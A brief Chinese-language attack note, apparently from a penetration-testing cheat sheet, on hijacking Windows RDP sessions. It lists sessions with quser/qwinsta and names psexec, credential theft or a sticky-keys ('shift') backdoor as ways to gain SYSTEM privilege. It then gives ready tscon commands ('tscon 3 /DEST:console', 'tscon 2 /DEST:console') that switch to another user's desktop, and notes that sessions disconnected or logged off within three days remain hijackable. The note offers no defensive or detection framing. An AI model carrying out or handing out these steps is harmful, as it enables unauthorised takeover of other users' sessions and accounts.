rdp会话劫持

执行quser 或者 qwinsta 查看会话id

尽管目前是离线状态，如果机器是在三天内注销的，也可以进行登陆劫持

ps：需要system权限（psexec或者凭证窃取，shift后门都可）

Tscon + 要劫持的会话ID + /DEST:你的会话名    #执行完就会切到你劫持会话的桌面。
tscon 3 /DEST:console

ID为2目前的状态已经断开了，但是如果是在三天之内注销的，还是可以登陆劫持。

tscon 2 /DEST:console